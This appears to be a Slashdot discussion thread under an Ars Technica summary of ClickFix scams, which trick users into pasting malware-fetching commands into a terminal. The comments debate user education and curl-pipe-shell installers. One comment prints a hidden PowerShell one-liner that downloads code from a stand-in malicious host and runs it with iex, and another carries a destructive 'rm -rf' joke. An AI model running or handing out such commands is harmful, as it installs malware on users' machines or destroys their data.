ClickFix May Be the Biggest Security Threat Your Family Has Never Heard Of

An anonymous reader quotes a report from Ars Technica: ClickFix often starts with an email sent from a hotel that the target has a pending registration with and references the correct registration information. In other cases, ClickFix attacks begin with a WhatsApp message. In still other cases, the user receives the URL at the top of Google results for a search query. Once the mark accesses the malicious site referenced, it presents a CAPTCHA challenge or other pretext requiring user confirmation. The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter. Once entered, the string of text causes the PC or Mac to surreptitiously visit a scammer-controlled server and download malware. Then, the machine automatically installs it -- all with no indication to the target. With that, users are infected, usually with credential-stealing malware. Security firms say ClickFix campaigns have run rampant. The lack of awareness of the technique, combined with the links also coming from known addresses or in search results, and the ability to bypass some endpoint protections are all factors driving the growth.

The commands, which are often base-64 encoded to make them unreadable to humans, are often copied inside the browser sandbox, a part of most browsers that accesses the Internet in an isolated environment designed to protect devices from malware or harmful scripts. Many security tools are unable to observe and flag these actions as potentially malicious. The attacks can also be effective given the lack of awareness. Many people have learned over the years to be suspicious of links in emails or messengers. In many users' minds, the precaution doesn't extend to sites that instruct them to copy a piece of text and paste it into an unfamiliar window. When the instructions come in emails from a known hotel or at the top of Google results, targets can be further caught off guard. With many families gathering in the coming weeks for various holiday dinners, ClickFix scams are worth mentioning to those family members who ask for security advice. Microsoft Defender and other endpoint protection programs offer some defenses against these attacks, but they can, in some cases, be bypassed. That means that, for now, awareness is the best countermeasure. Researchers from CrowdStrike described in a report a campaign designed to infect Macs with a Mach-O executive. "Promoting false malicious websites encourages more site traffic, which will lead to more potential victims," wrote the researchers. "The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim's machine while bypassing Gatekeeper checks."

Push Security, meanwhile, reported a ClickFix campaign that uses a device-adaptive page that serves different malicious payloads depending on whether the visitor is on Windows or macOS.

Are people this ignorant of basic online security?

[Smonster]

Clearly.

Fortunately there is an easy fix. Education. Never click on links from any email you receive unless you just initiated the link being sent to you. Go to the businesses actual website, log in from there. If it’s legit you’ll very likely see what it was talking about upon login or after a brief search through the sites menus.

Unfortunately for many people, they are too lazy, ignorant, and/or refuse to take basic and easy precautions. And yes, some people are just dumb on their best days. That’s why things like this work if you send such scams to enough people.

Re:

[bill_mcgonigle]

Yes, but half the people have below-average intelligence.

We won't have a stable society if they're constantly scammed.

And I know some High-IQ people with no street smarts who got scammed by "Raj from Microsoft Support".

Really some dude from a trailer park might have a better BS detector, having lived a less coddled existence.

Re:

[Wokan]

Yes, but half the people have below-average intelligence.

Finally. My chance to be modded as pedantic...

Half the people have a below-MEDIAN intelligence.

(Sorry, all. Couldn't resist.)

Re:

[ctilsie242]

This is something I see a lot. When people say, "caveat emptor", or "you have to be smarter next time" when a scammer is successful, it doesn't do any good. We do need some scammer protection to maintain a high-trust society. Otherwise, one can't really do much business, when most of life is spent trying to check if every part of a business transaction is legit, or something contrived.

Part of it is that some devices are deliberately wide open for advertising dollars. However, if someone can advertise, t

Re:

[fahrbot-bot]

Never click on links from any email you receive unless you just initiated the link being sent to you.

Certainly don't ever, "copy a string of text, open a terminal window, paste it in, and press Enter".
Seriously, why would any legitimate site ask you to do that. [*smacks forehead*]

Re:

[bagofbeans]

"Then, the machine automatically installs it -- all with no indication to the target."

Your point: the indication to the target was when they pasted something they didn't understand.

Re:

[Cochonou]

Well, the thing also masquerades itself as a tutorial to solve problems that people may have, as a sponsored Google result. And solving IT problems often involves typing arcade commands in a terminal window.

Re:

[drinkypoo]

as a sponsored Google result

This is the problem right here. Why is Google not considered an accessory? Google received consideration to disseminate it and the either employed no or insufficient oversight. This is not simply user-provided content which was posted without their cooperation.

Re:

[sabbede]

Yeah, their lax attitude towards keeping malicious sites out of their ad list should carry liability. They took money to direct unsuspecting users to scams. Why wouldn't they be liable?

Re:

[srg33]

Typos are funny: "typing arcade commands in a terminal window." I believe that you meant "arcane commands". But, many users treat everything like a video game ...

Re:

[ccr]

Indeed .. https://rust-lang.org/tools/in... [rust-lang.org] .. and many others that just instruct you to "curl | sh".

Re:

[ForkInMe]

I'm wondering what the overlap is in the Venn diagram of people smart enough to open the terminal window yet dumb enough to past random things into it?

Re:

[aitikin]

I'm wondering what the overlap is in the Venn diagram of people smart enough to open the terminal window yet dumb enough to past random things into it?

Pretty sure it's a lot when the sites are explaining how to open the terminal from the run command or Spotlight commands. I highly doubt that these bad actors are expecting the user to know how themselves and would expect they're giving them explicit instructions.

Re:

[pooh666]

Yeah, wow that is a scary smart exploit there! Exactly what I was going to say.

Re:

[Bert64]

The problem here is that many legitimate companies do in fact send unexpected emails containing links, or make unexpected calls without proving their identity (and even asking you to).
All of this trains users to expect such actions, and makes them more susceptible to the scams.

If you do practice basic precautions and question these companies for their poor practices they will often push back and call you paranoid.

Re:

[Jeremi]

Fortunately there is an easy fix. Education.

If education was an easy fix, we'd have an educated populace and ClickFix wouldn't be a problem.

The fact is, we live in eternal September. No matter how many people we educate, there's a unending firehose of exploitable n00bs arriving to replace them.

Re:

[arglebargle_xiv]

Fortunately there is an easy fix. Education.

If user education was going to work, it would have worked by now.

That's a quote from an A/V conference about 20 years ago. Even then it was obvious that it wasn't working.

Re:

[quenda]

Never click on links from any email you receive unless you just initiated the link being sent to you.

Why not? I'm curious. I'm not doing it from my work PC inside a secure facility. Should I be worried about a 0-day in Chrome?

OTOH, there is no way in hell I will paste a random string of text into a shell. Then again ... I've probably run a few 1-liner curl scripts to install software I just heard about :-(

Re:

[sabbede]

Laziness is why I'm surprised this works at all. Open a command prompt, no an admin prompt -> UAC -> copy - > paste -> another warning -> enter. How many victims get halfway through that before giving up?

WTF?

[Randseed]

Why the hell would someone go open a terminal window and paste random shit in from a web page?

Re:

[NoWayNoShapeNoForm]

Because you can't fix stupid?

Re:

[fahrbot-bot]

Because you can't fix stupid?

Guessing you really can't ClickFix it. :-)

Re:WTF?

[taustin]

"When you're dead, you do not know that you are dead. The pain is felt by others. The same thing happens when you're stupid"

Re:

[ddtmm]

This is comedy gold. Thanks for my laugh of the day.

Re:

[Ecuador]

Why is this modded funny? It's sadly insightful.

Re:

[Jjeff1]

Because they don't know any better. Some official looking web site says to press some buttons and do some thing, they do it. No different than amazon prompting them to type in their credit card number to buy steak knives. Even among knowledgeable people... There is an RMM I use, if you hit F12 in the browser, the hidden browser console has bright red bold font telling you not to paste anything into the console. And it's an RMM tool for IT people.

Re:

[WankerWeasel]

Average person wouldn't even know what the terminal is, much less how to go about running terminal commands. And anyone that knows what the terminal is, should be smart enough to know not to run terminal commands from any website, even ones you trust.

Re:

[Bert64]

No they don't know what it is, so when given instructions explaining how to invoke it they don't question them.

Re:

[codebase7]

Probably because they see idiots typing in "do as I say" [reddit.com] without reading the prompt and then bitch about the broken system after the fact as if it's normal.

Heads up people: If you see a black box with a blinking text cursor and no fancy Word functions, that's an expert-only area and you should leave it the fuck alone!

Re:

[bagofbeans]

Hey, this is your son who needs bail money. Send *whatever* in *Apple cards* to *wherever*.

It works. Credulous can't be fixed.

Re:

[Cochonou]

The second link is more interesting (and shows how can users be manipulated in doing that):

In an exemplar campaign from June 2025, when the victim searches for a macOS-related issue — for example, “macos flush resolver cache” — they receive a promoted malvertising website in their search results (Figure 1). Users located in multiple countries — including the U.S., UK, Japan, China, Colombia, Canada, Mexico, Italy, and others — received these advertisements; no victims

Re:

[tlhIngan]

Why the hell would someone go open a terminal window and paste random shit in from a web page?

Because it leads them to what they want?

You can advertise "free pr0n!" and have people copy and paste random text into a terminal window if they believe it'll get them to what they want. Your random script can even pop open a website to make it look legit.

It's the whole Dancing Pigs [wikipedia.org] means of security. If you offer a user a video of dancing pigs, they'll do anything to see it.

Re:

[Fly Swatter]

Many don't even know what a terminal is. We are now trained through 2-factor authorization techniques that it is OK to have to prove yourself through a second method outside the browser page. It's not a far leap from email or text messages to entering a code into an app window.

Re:

[tlhIngan]

Many don't even know what a terminal is. We are now trained through 2-factor authorization techniques that it is OK to have to prove yourself through a second method outside the browser page. It's not a far leap from email or text messages to entering a code into an app window.

It doesn't matter. You can walk through someone to install the Terminal app on Windows if they're motivated enough for the outcome.

People search all the time for free stuff - perhaps you can set up a page to "get Photoshop for free!"

Re:

[ToasterMonkey]

Why the hell would someone go open a terminal window and paste random shit in from a web page?

https://docs.chef.io/chef_inst... [docs.chef.io]
https://github.com/puppetlabs/... [github.com]
https://github.com/saltstack/s... [github.com]
https://docs.brew.sh/Installat... [docs.brew.sh]

This is accepted practice in the devops world unfortunately. It always sets off my spider senses when I see it, but with an authoritative enough looking source and informed timing as the article suggests, you could dupe a bunch of "modern" developers. For non-technical people, forget about it, why would most people doubt sketchy hotel WiFi setup instructions given the mess the

Hey Guys! Click! Fix! Here

[williamyf]

Today, we are gonna learn how to bypass al security safeties with simple hand tools. We will need a breaker bar, a torque wrench and our safety glasses

PowerShell defaults

[omnichad]

PowerShell defaults are partly to blame on the Windows side. You can't double click a .ps1 file without editing security settings. But you can pipe an irm command into iex and run a random script from the web with no checks at all. Just a one-liner copied and pasted and you're giving complete control over.

Re:

[codebase7]

OK I see the problem. We need to take away the ability to paste from end users. /s

Re:

[omnichad]

Actually, that's probably the right idea. Not blocking paste, of course. But as it is, a file downloaded from the Internet has attributes to mark it as potentially unsafe. The clipboard could probably handle such an attribute. And when pasting into sensitive areas, that flag could prompt a warning confirmation. Only a minor UAC type annoyance to the end user but at the very least a chance to validate. And if the user has an antivirus, scanning that string and the domain names in any URLs when pasting

Re:

[allo]

Look what the Firefox Developer console tells you when you try to paste in there for the first time:

Scam Warning: Take care when pasting things you don’t understand. This could allow attackers to steal your identity or take control of your computer. Please type ‘allow pasting’ below (no need to press enter) to allow pasting.

Re:

[Megane]

Perl had the concept of "tainted" input data to make it sort of possible to prevent SQL/shell injection, etc.. We've already got web browsers marking downloaded files as "treat this like a biohazard" even if just it's a stupid text file, why not clipboard contents too? (...to be followed by the scam instructions telling you to open a text editor, create a new document, paste into it, copy what you just pasted... the universe can always create Bigger Idiots)

Re:

[Bert64]

Same on macos and linux, it's not a windows specific fault.
In fact there is a lot of legitimate software which provides "paste this into terminal" instructions, for instance homebrew on macos (https://brew.sh). This then goes and retrieves a shellscript and executes it with no validation.

This is a general purpose computer fault. The fact is general purpose computers are not a suitable tool for the masses, they are highly complex tools only suitable for those who know how to use them safely. Most people woul

Re:

[nightflameauto]

Same on macos and linux, it's not a windows specific fault. In fact there is a lot of legitimate software which provides "paste this into terminal" instructions, for instance homebrew on macos (https://brew.sh). This then goes and retrieves a shellscript and executes it with no validation.

This is a general purpose computer fault. The fact is general purpose computers are not a suitable tool for the masses, they are highly complex tools only suitable for those who know how to use them safely. Most people would be much better off with an appliance.

I remember a time, not so long ago now, when folks started talking about licensing actual PCs, and everybody else could have tablets and chromebooks. It may seem harsh, but if security matters it may be time to discuss this again. It wouldn't even have to be a difficult bar to cross for security. "You receive an email with a link in it from someone you don't know. What do you do?"
"You see a pop-up ad telling you your system is infected and to click this link to clean it. What do you do?"

A series of five or

Ugh

[gurps_npc]

Man, at this point I am thinking I should just disable all links in any email I get.

You can't fix stupid

[OverlordQ]

The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter.

I mean . . come on

maybe I'm too dumb, but

[clemare]

how it's possibly that the file download itself and execute itself without me interacting with it in MacOS? if it's a payload it have to be an .app, .dmg file, because a .sh file need to change permissions to execution to be executed in the gui, otherwise it is treated like a regular file

Re:maybe I'm too dumb, but

[apparently]

If my understanding of this part of the summary is correct:

"The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter. "

what happens is, the user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter.

Re:

[ddtmm]

LOL!

Re:

[Ecuador]

You speak in riddles old man...

Re:

[clemare]

Thanks for the explanation, I miss that part

Re:

[sabbede]

I don't know what you're talking about. I'm pretty sure they're saying to paste "it" into the window. This makes sense, as computers are made out of IT.

Re:

[Bert64]

Go to https://brew.sh/ [brew.sh] - this is legitimate software for macos and the installation instructions are basically "paste this into a terminal".
It downloads a shellscript from github, and executes it.
There are quite a few legitimate programs like this, which trains users that this is normal.

Re:

[Carewolf]

Not sure I would clasify that kind of negligence as legitimate. But yeah, most git repos, have lines to clone them as text to be copied and pasted into a shell.

Sorry, you lost me at...

[ddtmm]

"The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter"

Seriously??

The old days...

[dskoll]

Ah yes, reminds me of the bad old days of the first PDP-8 virus:

"Your bank account has been compromised. To restore security, toggle in the following sequence on your PDP-8 front panel: 110101-010010 111110-000000 ..."

Re:

[codebase7]

The reason we don't, historically, is because a good number of us have personal experience in dealing with these kinds of "ordinary folks" endlessly.

Initially we were sympathetic, and offered guidance. After a while we all got tired of listening to the excuses and apologies.

Those "ordinary folks" got the idea that as long as they gave a good sounding excuse or apologized in front of management that there would be no consequences. For them. For us we have to spend time cleaning up their mess, and taking

Re:

[bagofbeans]

And they buy a Samsung fridge.

Re:

[coofercat]

One place I worked had disabled the command prompt entirely (from Windows). Ordinary folk don't really mind.

How you'd do that on a Mac, and how a mac user would like it is an exercise for the reader ;-)

Re:

[sabbede]

I don't know how to do that, but I suspect most Mac users wouldn't notice either. My experience is that they aren't aware of it. At least that's what I've gathered from their surprise in seeing me use it.

Re:

[sabbede]

What I read there was, "I have specialized knowledge and no patience for those who don't." How many plumbers do you think look down on their customers who call them out to fix a running toilet they broke with one of those in-tank disinfectant tabs (i.e. 2000 flushes)? Did you even know those things break down the rubber seals? I had to replace a few before I found out.

I don't know if it's related to that Dunning-Kruger effect, but it is something that people with specialized knowledge have to look out

Re:

[jvkjvk]

It's not "ordinary folks" - it's the willfully ignorant. And Yes, I have no sympathy for them.
They probably shouldn't be on the internet, in fact.

No interaction

[allo]

Copying something in a command prompt involves quite a bit of interaction. The text reads: "First, I contacted my bank, then I had them pay out all my money, then I put the wood and money into the fireplace, then I lit it up, and finally, I watched my money burn to ash without any interaction on my part!"

ClickFix attacks begin with a WhatsApp message

[Shakes Fist]

So, Meta using idiots are getting scammed. I'm not even getting some popcorn.
https://www.reuters.com/invest... [reuters.com]

Typical!

[zmollusc]

Try and talk someone through using Ping to diagnose a problem they are having? "OMG!!! A terminal window??? No way! What even is that? Text? Prompt? Are you speaking Klingon? Jesus!"

Scammer tells them to copy and paste some text into a command line window "Yep! No problem! Done it!"

sudo rm -rf :/

[Mirnotoriety]

$powershell -w hidden -nop -c "$x = [System.Text.Encoding]::UTF8.GetString((Invoke-webrequest -URI 'http://maliciüs-site.cöm/malware').Content); iex $x"

Re:

[Megane]

Remember: you can't spell powershell without "hell".

Clownstrike strikes again?

[vbdasc]

Only an utter idiot will paste and execute in a terminal window a command provided by someone unknown over the Internet.

Re:

[vbdasc]

I only hope that the good people at Microsoft, in their infinite wisdom and eternal quest for security, don't decide to make invoking the command prompt harder, or, G-d forbid, disable it altogether. It would truly be a catastrophe.

But does it run on Linux?

[mspohr]

A person has to be pretty stupid to blindly follow all these steps.

So it's stupid people? Ok then!

[jvkjvk]

>The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter.

If you are willing to do this, maybe you shouldn't own a computer. Just like a driver's license, maybe we should have some basic knowledge test to drive on the internet.